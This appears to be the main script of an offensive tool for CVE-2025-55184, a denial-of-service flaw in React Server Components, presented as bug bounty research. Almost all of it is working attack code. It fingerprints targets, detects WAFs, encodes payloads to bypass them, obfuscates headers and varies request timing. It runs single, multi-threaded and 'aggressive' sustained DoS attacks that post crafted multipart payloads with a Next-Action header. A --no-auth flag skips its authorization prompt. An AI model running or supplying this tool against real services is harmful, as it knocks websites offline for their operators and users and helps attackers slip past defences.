README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-55184 Advanced Exploitation Tool
Professional RSC DoS Framework for Ethical Bug Bounty Research
Author: CyberTechAjju
Version: 1.0.0
"""
import requests
import argparse
import sys
import time
import threading
from typing import Dict, List, Optional
from datetime import datetime
import json
# Import custom modules
from modules.ui_manager import UIManager
from modules.waf_bypass import WAFBypass
from modules.utils import Utils
class CVE2025_55184_Exploiter:
def __init__(self, target: str, config: Dict = None):
self.target = target
self.config = config or Utils.load_config()
self.payloads_db = Utils.load_payloads()
self.ui = UIManager()
self.waf = WAFBypass()
self.utils = Utils()
# Statistics
self.stats = {
'total_requests': 0,
'successful': 0,
'timeouts': 0,
'errors': 0,
'success_rate': 0.0
}
# Results storage
self.results = []
self.target_info = {}
def run(self, mode: str):
"""Main entry point for exploitation"""
self.ui.show_banner()
self.ui.show_warning()
# Authorization check
if self.config.get('ethical_controls', {}).get('require_authorization', True):
if not self.ui.get_authorization(self.target):
self.ui.print_error("Authorization denied. Exiting.")
sys.exit(1)
self.ui.print_success("Authorization confirmed. Proceeding with test...")
print()
# Parse and validate target
self.target_info = self._fingerprint_target()
self.ui.show_target_info(self.target_info)
print()
# Execute selected mode
if mode == 'detect':
self._run_detection()
elif mode == 'scan':
self._run_active_scan()
elif mode == 'single':
self._run_single_shot()
elif mode == 'multi':
self._run_multi_threaded()
elif mode == 'aggressive':
self._run_aggressive()
elif mode == 'waf':
self._run_waf_bypass()
elif mode == 'report':
self._generate_report()
else:
self.ui.print_error(f"Unknown mode: {mode}")
def _fingerprint_target(self) -> Dict:
"""Fingerprint target and gather information"""
with self.ui.show_spinner("Fingerprinting target"):
target_parsed = self.utils.parse_target(self.target)
# Resolve DNS
ip_address = self.utils.resolve_dns(target_parsed['hostname'])
# Check if port is open
port_open = self.utils.check_port_open(
target_parsed['hostname'],
target_parsed['port']
)
# Try to get server headers
try:
response = requests.head(
self.target,
timeout=5,
headers={'User-Agent': self.waf.get_random_user_agent()}
)
server_info = self.utils.fingerprint_server(dict(response.headers))
except:
server_info = {'framework': 'Unknown', 'server': 'Unknown'}
return {
'URL': self.target,
'IP Address': ip_address or 'Unknown',
'Port': target_parsed['port'],
'Port Status': '🟢 Open' if port_open else '🔴 Closed',
'Framework': server_info.get('framework', 'Unknown'),
'Server': server_info.get('server', 'Unknown'),
'Powered By': server_info.get('powered_by', 'Unknown')
}
def _run_detection(self):
"""Run passive detection mode"""
self.ui.print_info("Running passive detection (non-invasive)...")
time.sleep(1)
with self.ui.show_spinner("Detecting framework and vulnerabilities"):
# Check framework
framework = self.target_info.get('Framework', 'Unknown').lower()
# Check for RSC indicators
vulnerable = False
confidence = 0
if 'next' in framework:
vulnerable = True
confidence = 75
elif 'waku' in framework:
vulnerable = True
confidence = 70
elif 'remix' in framework:
vulnerable = True
confidence = 60
time.sleep(2)
print()
self.ui.show_vulnerability_status(vulnerable, confidence)
if vulnerable:
self.ui.print_warning("⚠️ Passive indicators suggest potential vulnerability")
self.ui.print_info("💡 Run active scan for confirmation: --mode scan")
def _run_active_scan(self):
"""Run active vulnerability scan"""
self.ui.print_info("Running active scan (minimal impact)...")
print()
# Detect WAF first
waf_info = self._detect_waf()
self.ui.show_waf_detection(waf_info)
print()
# Try multiple payloads
framework = self.target_info.get('Framework', 'Unknown').lower()
payloads_to_test = self._get_framework_payloads(framework)
vulnerable = False
successful_payload = None
with self.ui.create_progress_bar("Testing payloads") as progress:
task = progress.add_task("[cyan]Scanning...", total=len(payloads_to_test))
for payload_name, payload_data in payloads_to_test.items():
# Test payload
result = self._test_payload(payload_name, payload_data, waf_info)
if result['vulnerable']:
vulnerable = True
successful_payload = payload_name
break
progress.update(task, advance=1)
time.sleep(0.5)
print()
# Show results
if vulnerable:
self.ui.show_vulnerability_status(True, 95)
self.ui.print_success(f"✅ Vulnerability confirmed with payload: {successful_payload}")
# Show payload details
print()
self.ui.show_payload_info(successful_payload, payloads_to_test[successful_payload])
else:
self.ui.show_vulnerability_status(False)
self.ui.print_success("Target appears to be patched or not vulnerable")
def _test_payload(self, payload_name: str, payload_data: Dict, waf_info: Dict) -> Dict:
"""Test a single payload"""
payload = payload_data.get('payload')
encoding = payload_data.get('encoding', 'none')
# Apply WAF bypass if WAF detected
if waf_info.get('detected'):
bypass_strategy = self.waf.generate_bypass_strategy(waf_info.get('type', '').split(',')[0])
if encoding in bypass_strategy.get('techniques', []):
payload = self.waf.encode_payload(payload, encoding)
# Prepare request
framework = self.target_info.get('Framework', 'Unknown').lower()
headers = self._get_headers(framework, waf_info)
timeout = self.config.get('defaults', {}).get('timeout', 5)
try:
start_time = time.time()
response = requests.post(
self.target,
files={"0": ("", payload)},
headers=headers,
timeout=timeout
)
elapsed = time.time() - start_time
self.stats['total_requests'] += 1
# If request completed quickly, likely not vulnerable
return {
'vulnerable': False,
'payload': payload_name,
'elapsed_time': elapsed,
'status_code': response.status_code
}
except requests.exceptions.Timeout:
# Timeout indicates potential DoS
self.stats['total_requests'] += 1
self.stats['successful'] += 1
self.stats['timeouts'] += 1
return {
'vulnerable': True,
'payload': payload_name,
'elapsed_time': timeout,
'error': 'Timeout - likely vulnerable'
}
except requests.exceptions.RequestException as e:
self.stats['total_requests'] += 1
self.stats['errors'] += 1
return {
'vulnerable': False,
'payload': payload_name,
'error': str(e)
}
def _run_single_shot(self):
"""Execute single DoS attack"""
self.ui.print_warning("⚡ Launching single-shot DoS attack...")
print()
# Get basic payload
payload_data = self.payloads_db['payloads']['basic']
payload = payload_data['payload']
framework = self.target_info.get('Framework', 'Unknown').lower()
headers = self._get_headers(framework)
timeout = self.config.get('defaults', {}).get('timeout', 5)
with self.ui.show_spinner("Sending exploit payload"):
try:
requests.post(
self.target,
files={"0": ("", payload)},
headers=headers,
timeout=timeout
)
self.ui.print_error("[-] Target not vulnerable (request completed)")
except requests.exceptions.Timeout:
self.ui.print_success("[+] DoS successful - Target timed out!")
self.stats['successful'] += 1
except requests.exceptions.RequestException as e:
self.ui.print_error(f"[!] Error: {str(e)}")
def _run_multi_threaded(self):
"""Execute multi-threaded DoS attack"""
num_threads = self.config.get('attack_modes', {}).get('moderate', {}).get('threads', 5)
duration = self.config.get('attack_modes', {}).get('moderate', {}).get('duration', 30)
self.ui.print_warning(f"⚡ Launching multi-threaded attack ({num_threads} threads, {duration}s duration)...")
print()
# Confirmation
confirm = self.ui.prompt_input(f"This will send multiple requests. Continue? (yes/no)")
if confirm.lower() != 'yes':
self.ui.print_info("Attack cancelled")
return
print()
# Start attack
stop_event = threading.Event()
threads = []
def attack_worker():
payload = self.payloads_db['payloads']['basic']['payload']
framework = self.target_info.get('Framework', 'Unknown').lower()
while not stop_event.is_set():
headers = self._get_headers(framework)
headers = self.waf.obfuscate_headers(headers)
try:
requests.post(
self.target,
files={"0": ("", payload)},
headers=headers,
timeout=5
)
self.stats['total_requests'] += 1
except requests.exceptions.Timeout:
self.stats['timeouts'] += 1
self.stats['successful'] += 1
self.stats['total_requests'] += 1
except:
self.stats['errors'] += 1
self.stats['total_requests'] += 1
time.sleep(self.waf.apply_timing_variation())
# Launch threads
for i in range(num_threads):
t = threading.Thread(target=attack_worker)
t.start()
threads.append(t)
# Monitor progress
with self.ui.create_progress_bar("Attack in progress") as progress:
task = progress.add_task("[red]Attacking...", total=duration)
for _ in range(duration):
time.sleep(1)
progress.update(task, advance=1)
# Stop threads
stop_event.set()
for t in threads:
t.join()
# Show results
print()
self._update_success_rate()
self.ui.show_result('success', 'Attack completed',
f"Total Requests: {self.stats['total_requests']}\n"
f"Timeouts: {self.stats['timeouts']}\n"
f"Success Rate: {self.stats['success_rate']:.1f}%"
)
def _run_aggressive(self):
"""Execute aggressive sustained attack"""
self.ui.print_error("🔥 AGGRESSIVE MODE - High impact attack")
self.ui.print_warning("This mode will cause significant service disruption!")
print()
confirm = self.ui.prompt_input("Type 'I UNDERSTAND THE IMPACT' to continue")
if confirm != 'I UNDERSTAND THE IMPACT':
self.ui.print_info("Attack cancelled")
return
# Use aggressive config
num_threads = self.config.get('attack_modes', {}).get('aggressive', {}).get('threads', 10)
duration = self.config.get('attack_modes', {}).get('aggressive', {}).get('duration', 60)
self.ui.print_info(f"Starting aggressive attack: {num_threads} threads, {duration}s duration")
print()
# Similar to multi-threaded but with all payloads
self._run_multi_threaded()
def _run_waf_bypass(self):
"""Run WAF detection and bypass testing"""
self.ui.print_info("🛡️ Running WAF detection and bypass testing...")
print()
# Detect WAF
waf_info = self._detect_waf()
self.ui.show_waf_detection(waf_info)
print()
if not waf_info['detected']:
self.ui.print_success("No WAF detected - standard exploitation possible")
return
# Generate bypass strategy
waf_type = waf_info.get('type', '').split(',')[0].strip()
strategy = self.waf.generate_bypass_strategy(waf_type)
self.ui.show_result('info', 'WAF Bypass Strategy',
f"WAF Type: {waf_type}\n"
f"Strategy: {strategy.get('description')}\n"
f"Techniques: {', '.join(strategy.get('techniques', []))}"
)
# Test bypass
print()
self.ui.print_info("Testing bypass techniques...")
# Try various bypass methods
vulnerable = False
for technique in strategy.get('techniques', []):
payload = self.payloads_db['payloads']['basic']['payload']
encoded_payload = self.waf.encode_payload(payload, technique)
self.ui.print_info(f" Trying {technique} encoding...")
# Test it
result = self._test_payload('basic', {'payload': encoded_payload, 'encoding': technique}, waf_info)
if result.get('vulnerable'):
vulnerable = True
self.ui.print_success(f" ✅ Bypass successful with {technique}!")
break
else:
self.ui.print_error(f" ✗ {technique} failed")
print()
if vulnerable:
self.ui.show_vulnerability_status(True, 85)
else:
self.ui.print_warning("WAF bypass attempts unsuccessful")
def _detect_waf(self) -> Dict:
"""Detect WAF protection"""
try:
response = requests.get(
self.target,
headers={'User-Agent': self.waf.get_random_user_agent()},
timeout=5
)
waf_info = self.waf.detect_waf(dict(response.headers), response.text)
return waf_info
except Exception as e:
return {'detected': False, 'type': None, 'confidence': 0, 'bypass_available': False}
def _get_headers(self, framework: str, waf_info: Dict = None) -> Dict:
"""Get appropriate headers for framework"""
headers = {'User-Agent': self.waf.get_random_user_agent()}
if 'next' in framework.lower():
headers['Next-Action'] = 'x'
# Apply obfuscation if WAF detected
if waf_info and waf_info.get('detected'):
headers = self.waf.obfuscate_headers(headers)
return headers
def _get_framework_payloads(self, framework: str) -> Dict:
"""Get relevant payloads for detected framework"""
all_payloads = self.payloads_db.get('payloads', {})
framework_payloads = {}
for name, data in all_payloads.items():
if framework in data.get('frameworks', []):
framework_payloads[name] = data
# If no specific payloads, return all
if not framework_payloads:
return all_payloads
return framework_payloads
def _update_success_rate(self):
"""Update success rate statistic"""
self.stats['success_rate'] = self.utils.calculate_success_rate(
self.stats['successful'],
self.stats['total_requests']
)
def _generate_report(self):
"""Generate bug bounty report"""
self.ui.print_info("📊 Generating bug bounty report...")
report_data = {
'target': self.target,
'timestamp': self.utils.format_timestamp(),
'target_info': self.target_info,
'vulnerable': self.stats['successful'] > 0,
'confidence': 90 if self.stats['successful'] > 0 else 10,
'statistics': self.stats,
'framework': self.target_info.get('Framework', 'Unknown'),
'server': self.target_info.get('Server', 'Unknown'),
'ip_address': self.target_info.get('IP Address', 'Unknown')
}
# Save in multiple formats
output_dir = self.config.get('reporting', {}).get('output_dir', './reports')
json_path = self.utils.save_report(report_data, 'json', output_dir)
md_path = self.utils.save_report(report_data, 'markdown', output_dir)
html_path = self.utils.save_report(report_data, 'html', output_dir)
print()
self.ui.print_success(f"Report saved:")
self.ui.print_info(f" 📄 JSON: {json_path}")
self.ui.print_info(f" 📄 Markdown: {md_path}")
self.ui.print_info(f" 📄 HTML: {html_path}")
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-55184 Advanced Exploitation Tool by CyberTechAjju',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Passive detection
python cve_2025_55184_exploit.py -t http://localhost:3000 -m detect
# Active scan
python cve_2025_55184_exploit.py -t http://localhost:3000 -m scan
# Single DoS attack
python cve_2025_55184_exploit.py -t http://localhost:3000 -m single
# Multi-threaded attack
python cve_2025_55184_exploit.py -t http://localhost:3000 -m multi
# WAF bypass
python cve_2025_55184_exploit.py -t http://localhost:3000 -m waf
# Generate report
python cve_2025_55184_exploit.py -t http://localhost:3000 -m report
Modes:
detect - Passive detection (safe, non-invasive)
scan - Active vulnerability scanning (minimal impact)
single - Single-shot DoS attack (low intensity)
multi - Multi-threaded attack (moderate impact)
aggressive - Aggressive sustained attack (high impact)
waf - WAF detection and bypass testing
report - Generate bug bounty report
"""
)
parser.add_argument('-t', '--target', required=True, help='Target URL')
parser.add_argument('-m', '--mode', required=True,
choices=['detect', 'scan', 'single', 'multi', 'aggressive', 'waf', 'report'],
help='Exploitation mode')
parser.add_argument('-c', '--config', default='config.json', help='Config file path')
parser.add_argument('--no-auth', action='store_true', help='Skip authorization prompt (dangerous!)')
args = parser.parse_args()
# Load config
config = Utils.load_config(args.config)
# Override authorization if requested
if args.no_auth:
if 'ethical_controls' not in config:
config['ethical_controls'] = {}
config['ethical_controls']['require_authorization'] = False
# Initialize exploiter
exploiter = CVE2025_55184_Exploiter(args.target, config)
try:
exploiter.run(args.mode)
except KeyboardInterrupt:
print("\n\n")
exploiter.ui.print_warning("⚠️ Attack interrupted by user")
sys.exit(0)
except Exception as e:
print("\n\n")
exploiter.ui.print_error(f"Error: {str(e)}")
sys.exit(1)
if __name__ == "__main__":
main()